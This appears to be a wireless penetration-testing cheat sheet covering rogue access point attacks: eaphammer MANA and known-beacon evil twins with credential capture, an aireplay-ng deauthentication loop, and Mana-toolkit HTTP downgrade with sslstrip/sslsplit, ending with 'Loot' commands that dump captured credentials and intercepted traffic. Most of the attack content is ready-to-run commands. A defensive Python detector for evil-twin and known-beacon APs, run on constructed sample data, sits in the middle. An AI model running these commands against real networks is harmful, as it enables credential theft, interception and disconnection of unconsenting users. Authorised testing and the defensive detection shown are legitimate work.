Mana and Known Beacons
WIPS bypass
Create white list
echo <BSSID> > bssid_targets.txt
Create rogue AP
./eaphammer -i <wlan0> -e <ESSID> --pmf enable --cloaking full --mana --auth <wpa-eap | wpa-psk> --creds --mac-whitelist bssid_targets.txt
While the rogue AP waits for probe requests, deauthenticate the supplicants:
for i in `cat bssid_targets.txt`; do aireplay-ng -0 5 -a <ap_mac> -c $i; done
MANA loud mode
./eaphammer -i <wlan0> -e <ESSID> --cloaking full --mana --loud
Known beacon attack
./eaphammer -i <wlan0> --mana -e <known_ESSID> --known-beacons --captive-portal --known-ssids-file <list_of_known_ESSID.txt> [--loud]
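From the defender's side, the two behaviours above leave a recognisable footprint in beacon frames: an evil twin beacons a managed SSID from a BSSID that is not in the AP inventory, and a known-beacon rogue AP beacons many unrelated SSIDs from one radio. The following Python is an added example, not eaphammer or mana code; the AP inventory, the threshold and the observation records are constructed sample data, in the shape a WIDS sensor or scanner would produce.

```python
"""Flag evil-twin and known-beacon style rogue APs from observed beacons.

Added illustration, not part of eaphammer/mana. Each observation is a
constructed (bssid, ssid, channel) tuple as parsed from a beacon frame.
"""
from collections import defaultdict

# Assumed inventory of the organisation's own APs (constructed sample).
AUTHORIZED = {
    "CorpWiFi": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
}
# One radio beaconing this many distinct SSIDs is treated as suspicious.
MANY_SSIDS = 3


def analyse_beacons(observations, authorized=AUTHORIZED, threshold=MANY_SSIDS):
    """Return {'evil_twin': [...], 'known_beacon': [...]} (sorted BSSIDs).

    evil_twin:    BSSIDs beaconing a managed SSID without being in the inventory.
    known_beacon: BSSIDs beaconing >= threshold distinct SSIDs, the pattern of a
                  rogue AP replaying a list of SSIDs learned from probe requests.
    """
    ssids_by_bssid = defaultdict(set)
    evil_twin = set()
    for bssid, ssid, _channel in observations:
        bssid = bssid.lower()
        ssids_by_bssid[bssid].add(ssid)
        if ssid in authorized and bssid not in {b.lower() for b in authorized[ssid]}:
            evil_twin.add(bssid)
    known_beacon = {b for b, s in ssids_by_bssid.items() if len(s) >= threshold}
    return {"evil_twin": sorted(evil_twin), "known_beacon": sorted(known_beacon)}


# Constructed sample: one legitimate AP, one evil twin of CorpWiFi, and one
# radio beaconing several unrelated SSIDs.
SAMPLE = [
    ("00:11:22:33:44:01", "CorpWiFi", 6),
    ("DE:AD:BE:EF:00:01", "CorpWiFi", 6),      # managed SSID, unknown BSSID
    ("de:ad:be:ef:00:02", "Starbucks", 11),
    ("de:ad:be:ef:00:02", "HomeNet-5G", 11),
    ("de:ad:be:ef:00:02", "attwifi", 11),
]

if __name__ == "__main__":
    print(analyse_beacons(SAMPLE))
```

On a live sensor the same function can be fed from a capture loop; the threshold is a tuning knob, since some legitimate controllers also beacon multiple SSIDs per radio.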
Mana-toolkit (deprecated) - HTTP downgrade attacks
Info: This technique is extremely efficient against old smartphone OSes and poorly configured MDM applications. But the MitM toolset is deprecated, so I use an old, custom, dedicated Kali VM.
- 4.15.0-kali2-amd64
- Alfa AWUS036NHA + Alfa 9dBi WiFi Booster
- Mana-Toolkit installed with apt
Start Mana - Custom script
/usr/share/mana-toolkit/run-mana/custom.sh
Loot
cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keyword>
cp -r /var/lib/mana-toolkit/sslsplit/ /tmp
bulk_extractor -R /tmp/sslsplit/ -o /tmp/loot
binwalk /tmp/sslsplit/* -e